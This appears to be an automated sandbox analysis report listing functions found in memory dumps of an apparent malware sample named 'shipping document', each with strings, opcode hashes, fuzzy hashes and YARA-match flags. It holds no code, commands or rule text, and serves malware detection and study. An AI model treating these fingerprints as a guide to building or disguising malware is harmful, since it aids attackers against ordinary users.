                                                                                                Function 0179BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017D7B7F
                                                                                                • RTL: Re-Waiting, xrefs: 017D7BAC
                                                                                                • RTL: Resource at %p, xrefs: 017D7B8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: 6a3cc7dfee0151cd0eb4642b602af3c7dc008a29a7d303ac30e8b16687d9dc23
                                                                                                • Instruction ID: 0be4412b5898f356168f99d6f703827bfacdc788ab1cc97d2ce66a685fd06258
                                                                                                • Opcode Fuzzy Hash: 6a3cc7dfee0151cd0eb4642b602af3c7dc008a29a7d303ac30e8b16687d9dc23
                                                                                                • Instruction Fuzzy Hash: 504106313047069FDB25DE29E841F6AF7E6EF88710F100A1DF95ADB680DB71E9098B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D728C
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 017D72C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017D7294
                                                                                                • RTL: Resource at %p, xrefs: 017D72A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: 24a0e706d5535cfef4c8e4e7100dbad9b3ff3efd4b58f63c9e64d0b1ce50d1f5
                                                                                                • Instruction ID: 5c38f63d118b98fb51d1cf57d623522b6a946f3fbec9bb94c536d604854f9311
                                                                                                • Opcode Fuzzy Hash: 24a0e706d5535cfef4c8e4e7100dbad9b3ff3efd4b58f63c9e64d0b1ce50d1f5
                                                                                                • Instruction Fuzzy Hash: 1B411F3270424AABCB25DE29DC42F6AF7B5FB94714F100619FA55AB240DB20F8069BD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01812300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: d297ad81b6ac04a48302f41a7c1d2310a69f5559e5d9e0f87a20fe5cad197acc
                                                                                                • Instruction ID: 8a15ba16c7f35fb2e6ae67d130bde5e70a1003ae97f207112c33f67b0c27be18
                                                                                                • Opcode Fuzzy Hash: d297ad81b6ac04a48302f41a7c1d2310a69f5559e5d9e0f87a20fe5cad197acc
                                                                                                • Instruction Fuzzy Hash: 28318272A002199FDB20DE2DCC40BEEB7FDEF54750F94055AE949E3204EB30AB448BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 8540c7535e1ee4140c0f88532ddf5d2e431fbc54a5658c662e7e4ec9c5886c4d
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: 9D91B571E002069BDF28DF6DC8816BEFBB5AFC4321F94471AE955E72C4D7328A418751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01769126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: dd018f05f94d1b1e68c035dd28388ceb942faba2c4daa4048ca31a12232b9536
                                                                                                • Instruction ID: 53b419683d9d9e2d0b0feee1c2a2d5422d26b3729c1d4304a9f9e45e1b7d2d64
                                                                                                • Opcode Fuzzy Hash: dd018f05f94d1b1e68c035dd28388ceb942faba2c4daa4048ca31a12232b9536
                                                                                                • Instruction Fuzzy Hash: F2811C71D00269DBDB35DB54CC44BEEBBB8AB48714F1041DAEA19B7640E7305E84CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                Function 03B0E026 Relevance: .1, Instructions: 112COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dca743743368cfd3a921bd3af004aa8f6db2d82f4eb0762332fc0afc0e631540
                                                                                                • Instruction ID: b361c456c8d862bc81a845e5ea04545c0303693c96d4eb7eb8b62807faddab9d
                                                                                                • Opcode Fuzzy Hash: dca743743368cfd3a921bd3af004aa8f6db2d82f4eb0762332fc0afc0e631540
                                                                                                • Instruction Fuzzy Hash: 3B31D451A587F14ED31E836D08BDA75AFC18E5720174EC2EEDADA6F2F3C4888408D3A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B0D329 Relevance: 61.8, Strings: 49, Instructions: 558COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$ $""$$$%M$&a$+$1o$1|$3$6O$8$9:$:i$;$<#$=$>$A$B,$Ed$Ek$Eo$H$QD$RA$Zq$^$^U$`8$a$d$e$is$k$l$n$n$p$u$v>$x*$y5${$.$K$K$j$u
                                                                                                • API String ID: 0-2852707999
                                                                                                • Opcode ID: 72b970e996b5b3c753b2949c229cd04690a11578fed9e98936b668b27b316c55
                                                                                                • Instruction ID: 69453cff6af6e1d33a406289f108e62775f268c88dc4708b3c7c2cc0128570b1
                                                                                                • Opcode Fuzzy Hash: 72b970e996b5b3c753b2949c229cd04690a11578fed9e98936b668b27b316c55
                                                                                                • Instruction Fuzzy Hash: 76728DB0D05269CBEB24CF85C998BDDBBB1BB45308F1082D9C5496B285C7B95EC9CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1AEA9 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$O$S$\$s
                                                                                                • API String ID: 0-3854637164
                                                                                                • Opcode ID: e03978e5d513941b5ccb0aa9a45533f5108a1de7ec35a2bdaf0fb13c9fbc9743
                                                                                                • Instruction ID: 0aa25aa373d692bc5caebaf05f6fa0aef0f5e4d41d63314536f92aa1bc5e2c4a
                                                                                                • Opcode Fuzzy Hash: e03978e5d513941b5ccb0aa9a45533f5108a1de7ec35a2bdaf0fb13c9fbc9743
                                                                                                • Instruction Fuzzy Hash: 6A41D9B6D00219BBDB14EBD4EC48EEAB7BCEF44318F4441E9E91C97140E771AA148BD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B27C89 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Xk
                                                                                                • API String ID: 0-3923475827
                                                                                                • Opcode ID: 76d704efc0350266f7d7df576c372b61dc0485a3b9a6913525879bf503dead80
                                                                                                • Instruction ID: 57e88e834081240098b6286f31949d51c8794a52d9e871dd6246a8ce6fc83ee0
                                                                                                • Opcode Fuzzy Hash: 76d704efc0350266f7d7df576c372b61dc0485a3b9a6913525879bf503dead80
                                                                                                • Instruction Fuzzy Hash: 9911E2F6D0121CAF8B40DFD9D8409EFBBF8EF48200F1446AAE919E7240E7705A148FA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B28A19 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Q
                                                                                                • API String ID: 0-3451048873
                                                                                                • Opcode ID: 41f36ed98ef97acf5a7dc2511561d16bf0ec990af69fae3cc37740cc2e29e6e4
                                                                                                • Instruction ID: 75978bd2f537b6a5705a36e4dbc3e2b4961101ce4195c0007f07a14d2552c1e7
                                                                                                • Opcode Fuzzy Hash: 41f36ed98ef97acf5a7dc2511561d16bf0ec990af69fae3cc37740cc2e29e6e4
                                                                                                • Instruction Fuzzy Hash: 5F11B2B6D01219AF9B00DFA9D8419EEBBF9EF48215F0445AAE919E7240E7715A048FA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B07199 Relevance: .1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eeb792e6b765375dcb2610adfa977b60689efb16e2e162a037b86f1cd9147c5c
                                                                                                • Instruction ID: 704e432f74f35b3a553ba9f75e4afcb612598e3ff7882d7c2b98bd573c5100e9
                                                                                                • Opcode Fuzzy Hash: eeb792e6b765375dcb2610adfa977b60689efb16e2e162a037b86f1cd9147c5c
                                                                                                • Instruction Fuzzy Hash: 2941EEB1D11219AFDB04DF99DC85AEEBFBCEF49710F10415AFA14E6240E7B0A641CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B039 Relevance: .1, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction ID: bcb6d01b2b0e93b5cec4e0cb9de2b1a15a299be1f3ece1b92ec1e5fc5a05193f
                                                                                                • Opcode Fuzzy Hash: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction Fuzzy Hash: 2D31E5B5A00209AFDB14DF99D880EDEBBF9EF8C314F108259F918A7340D730A901CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B199 Relevance: .1, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction ID: 0171fdf13adba3cfc869b32359f03eb547d214cb6dbc571cc6c8c20bad70af75
                                                                                                • Opcode Fuzzy Hash: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction Fuzzy Hash: B831ECB5A00208AFDB14DF99D880EEE7BF9EF8C314F108659FD18A7240D770A911CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2AA89 Relevance: .1, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b126779df13a7c8c043ad35536ca21b93b3fd6636024284c9d132de91987584f
                                                                                                • Instruction ID: a3ad5cb6ef8f8254e7079275ca8ba247301080299f77f79661691fafdaf7d8f0
                                                                                                • Opcode Fuzzy Hash: b126779df13a7c8c043ad35536ca21b93b3fd6636024284c9d132de91987584f
                                                                                                • Instruction Fuzzy Hash: A7210C75A00219AFDB14DF99DC81EEF7BB9EF89314F004259F918A7240D770A911CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B1ACE9 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f15528b4e6f0f687cf2471030a7b927ac69d3cdf9502e748ad5c6425ee21fba
                                                                                                • Instruction ID: 3a7618d2f5c3189791d62c4511a9ca53c773016b0c684f5dfc8b01221094553b
                                                                                                • Opcode Fuzzy Hash: 6f15528b4e6f0f687cf2471030a7b927ac69d3cdf9502e748ad5c6425ee21fba
                                                                                                • Instruction Fuzzy Hash: 2311C2B6380315BBF720EA569C83FAB375C9B84B54F244169FB08AE2C0D6A4F81146B4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B23C5E Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03c00151e658f372942ce0e49af33ac73dc86147276a3d48819fab7838e58f2b
                                                                                                • Instruction ID: 0424eac1525aa0960b8f0e19d432da43a6958efe65d6a82148b7416c8e8b6a88
                                                                                                • Opcode Fuzzy Hash: 03c00151e658f372942ce0e49af33ac73dc86147276a3d48819fab7838e58f2b
                                                                                                • Instruction Fuzzy Hash: 8A110A77F142286BEB10D66CACC0AB9B7ECDB46529B1C07FAEC4CCB641E5959C1243D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B3B9 Relevance: .1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c9fe37ffbee823dd8821555c9a04b75b661cba8fb889814decbf97f2c1e4898
                                                                                                • Instruction ID: 7d25c6daa8438623214dff1833c2452c2e20b4baa2be364db7ba91174cc83cd5
                                                                                                • Opcode Fuzzy Hash: 2c9fe37ffbee823dd8821555c9a04b75b661cba8fb889814decbf97f2c1e4898
                                                                                                • Instruction Fuzzy Hash: B4210CB5A00718AFDB14DF99DC81F9F7BB9EF88714F008559F918A7240D770A911CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2A8A9 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8116587e1272cd4683999e60284f59ff562178d0895b3faab346ad28efda6f14
                                                                                                • Instruction ID: 59633b2c2c1d3311eb75c7abe1f5e27a582c0e239b070a177a8312e9ac539900
                                                                                                • Opcode Fuzzy Hash: 8116587e1272cd4683999e60284f59ff562178d0895b3faab346ad28efda6f14
                                                                                                • Instruction Fuzzy Hash: 24118275600754BFD720EBA9DC45FAB7BACEF85710F00465AF958AA280D7706A10CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B277E9 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71c98516fa033ba7bc1a8b89c509dac2e5978f619f1546192f7cec4717b8cfa2
                                                                                                • Instruction ID: bda39788511b38831e167ddecde6cf96feff6fae68b48fce2a3e9e939fbae45c
                                                                                                • Opcode Fuzzy Hash: 71c98516fa033ba7bc1a8b89c509dac2e5978f619f1546192f7cec4717b8cfa2
                                                                                                • Instruction Fuzzy Hash: D511E2B6D01219AFCB01DFD9D8409EFBBF8EF58210F0442AAE919E7200E7705A048BE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2A749 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4eb81fc80e7f8086744515a5ae64fbc040131eda72d5150dbf53d785518156d2
                                                                                                • Instruction ID: 11b6e0ff0534989e139f67f922ad5a89c475f0d2f407f5f79b00079d24ada4b7
                                                                                                • Opcode Fuzzy Hash: 4eb81fc80e7f8086744515a5ae64fbc040131eda72d5150dbf53d785518156d2
                                                                                                • Instruction Fuzzy Hash: 2F119475600314BBE710EBA5DC45FAF77ACEF85714F00455AF918A7284D7706911CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B24119 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab31f6cc14f7e5eb12ea205bd32092472aefc496aed9c6955d01856d278c18dd
                                                                                                • Instruction ID: 5f00b90962f39b1f66988519936d6a4f95e3ebd317ac01467afc5f360ebd4e2e
                                                                                                • Opcode Fuzzy Hash: ab31f6cc14f7e5eb12ea205bd32092472aefc496aed9c6955d01856d278c18dd
                                                                                                • Instruction Fuzzy Hash: A50144BAA013246BD711E695DC45DFB776CDF44214F0003A6FD28DB241FAB4AE5146E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B28379 Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8318372fbceda74ef665add22d56f5e0c1686fef8b9083ab8012f3513555b554
                                                                                                • Instruction ID: a0841dc669f60b9026835bdcafd7811513dff1b9bdc546e811cf3555f056eee9
                                                                                                • Opcode Fuzzy Hash: 8318372fbceda74ef665add22d56f5e0c1686fef8b9083ab8012f3513555b554
                                                                                                • Instruction Fuzzy Hash: 2311E2B6D0121CAF9B40DFE9D8409EEFBF8FF58214F1445AAE919E7200E7705A048FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B243AC Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4e9d7757b1677816d21c3b722d53f9b8eee50f6f1892a3414784a83e82779404
                                                                                                • Instruction ID: 15bb6853162b01c81557257ee166d0a2a2a3b18b01e413af9a7e8f1ef40122f7
                                                                                                • Opcode Fuzzy Hash: 4e9d7757b1677816d21c3b722d53f9b8eee50f6f1892a3414784a83e82779404
                                                                                                • Instruction Fuzzy Hash: 8C01D036C08765A9C706CA65A8448F9FF71DDC0228B1D07FAD5954AC43D932970A8BD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B243CA Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e1e902785e8111d7ecd002b27a325d663027d2b10e2ed11f04bc44aac77be005
                                                                                                • Instruction ID: b70832292d4b0f149e0003a74c01d45abdc47cf928fd5775671073874ce0aeda
                                                                                                • Opcode Fuzzy Hash: e1e902785e8111d7ecd002b27a325d663027d2b10e2ed11f04bc44aac77be005
                                                                                                • Instruction Fuzzy Hash: 1C01C0258043A569C70ADE6598408E9BF75DDC1268B2C07EED5954E883CA329B0A8BD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B0718B Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea5df652b4b520207267a4ce89a2101958f219874fe8aea4ef25c67b41cab88c
                                                                                                • Instruction ID: 2e98c85f3b569f2d83fb1ff258cd591db42d2c886f0efaafb681261b14cd0cbf
                                                                                                • Opcode Fuzzy Hash: ea5df652b4b520207267a4ce89a2101958f219874fe8aea4ef25c67b41cab88c
                                                                                                • Instruction Fuzzy Hash: D9112AB1D11229AFCB00CFA9D88059DBFF8FB09724F2081ABE818E7241D77096418FD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 03B2B719 Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction ID: e4ab8da5d5491409eb907070c2ff7142d70c640385f418c9964bfed834ffce5e
                                                                                                • Opcode Fuzzy Hash: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction Fuzzy Hash: BD01C0B6210608BBCB14DE99DC90EEB77ADAF8C714F008218BA09E7245D630F8518BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

